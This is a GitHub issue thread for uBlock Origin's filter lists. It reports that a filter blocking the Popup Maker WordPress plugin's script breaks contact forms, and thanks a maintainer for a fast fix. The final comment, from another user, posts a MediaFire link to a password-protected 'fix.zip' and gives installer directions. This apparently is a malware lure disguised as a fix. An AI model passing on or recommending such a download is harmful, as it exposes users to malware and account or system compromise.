### ISSUE TITLE
stablesoftware.com.au: breakage

### ISSUE THREAD

**Issue by dreadedhamish** [uBlockOrigin/uAssets#25088]
### Prerequisites

- [X] This is **NOT** a [_YouTube_](https://www.github.com/uBlockOrigin/uAssets/issues/20586), [_Facebook_](https://www.github.com/uBlockOrigin/uAssets/issues/3367), [_Twitch_](https://www.github.com/uBlockOrigin/uAssets/issues/5184) or [_a shortener/hosting site_](https://github.com/uBlockOrigin/uAssets/discussions/17361) report. _These sites MUST be reported by clicking their **respective links**_.
- [X] I read and understand the [policy about what is a valid filter issue](https://github.com/uBlockOrigin/uAssets/blob/master/README.md#uassets).
- [X] I verified that this issue is not a duplicate. (Search [here](https://github.com/uBlockOrigin/uAssets/issues) to find out.)
- [X] I did not remove any of the [default filter lists](https://github.com/uBlockOrigin/uAssets/assets/66517106/6e8d024a-5869-47cf-b142-b2357eb6c7d0), or I have verified that the issue was not caused by removing any of the default lists.
- [X] I did not enable additional filter lists, or I have verified that the issue still occurs without enabling additional filter lists.
- [X] I do not have custom filters/rules, or I have verified that the issue still occurs without custom filters/rules.
- [X] I am not using uBlock Origin along with other content blockers.
- [X] I have verified that the web browser's built-in content blocker/tracking protection, [network wide/DNS blocking](https://en.wikipedia.org/wiki/DNS_blocking), or my VPN is not causing the issue.
- [X] I have verified that other extensions are not causing the issue.
- [X] If this is about a breakage or detection, I have verified that it is caused by uBlock Origin and isn't a site issue.
- [ ] I did not answer truthfully to **ALL** the above checkboxes.

### URL(s) where the issue occurs.

```yaml
https://stablesoftware.com.au/
All sites using Popup Maker Wordpress plugin
```

### Description

The JS of Popup Maker(https://wordpress.org/plugins/popup-maker/) is currently blocked:
/wp-content/uploads/pum/pum-site-scripts.js^
This is a popular wordpress plugin that provides functionality for modals, slide-outs, banner bars, loading screens, lightboxes etc...
While it can be used to serve ads and annoying popups, in-and-of itself it's just a functionality extension. 

I'm have 2 clients sites that use it for contact forms or info panels - no ads and only user requested actions - that are broken.

### Other extensions used

none

### Screenshot(s)

<details>
<summary>Screenshot(s)</summary>

</details>

### Configuration

<details>
<summary>Details</summary>

```
uBlock Origin: 1.59.0
Chromium: 127
filterset (summary):
 network: 106455
 cosmetic: 39994
 scriptlet: 24798
 html: 0
listset (total-discarded, last-updated):
 removed:
  easylist: null
 added:
  adguard-cookies: 31140-60, 2d.13h.32m
  ublock-cookies-adguard: 1655-9, 1d.20h.32m
 default:
  user-filters: 2-0, never
  easyprivacy: 53055-647, 4h.32m Δ
  plowe-0: 3547-0, 6d.19h.33m
  ublock-badware: 10760-6, 4h.32m Δ
  ublock-filters: 39663-273, 4h.32m Δ
  ublock-privacy: 1072-2, 4h.32m Δ
  ublock-quick-fixes: 214-0, 4h.32m Δ
  ublock-unbreak: 2467-0, 4h.32m Δ
  urlhaus-1: 28790-0, 12h.32m
filterset (user): [array of 2 redacted]
trustedset:
 added: [array of 29 redacted]
switchRuleset:
 added: [array of 1 redacted]
userSettings: [none]
hiddenSettings: [none]
supportStats:
 allReadyAfter: 987 ms (selfie)
 maxAssetCacheWait: 632 ms
 cacheBackend: indexedDB
popupPanel:
 blocked: 1
 network:
  stablesoftware.com.au: 1

```
</details>

**Comment by dreadedhamish** [comment]
@stephenhawk8054 did you really just resolve this issue in 8 minutes? thankyou for your service!

**Comment by royalkush** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."
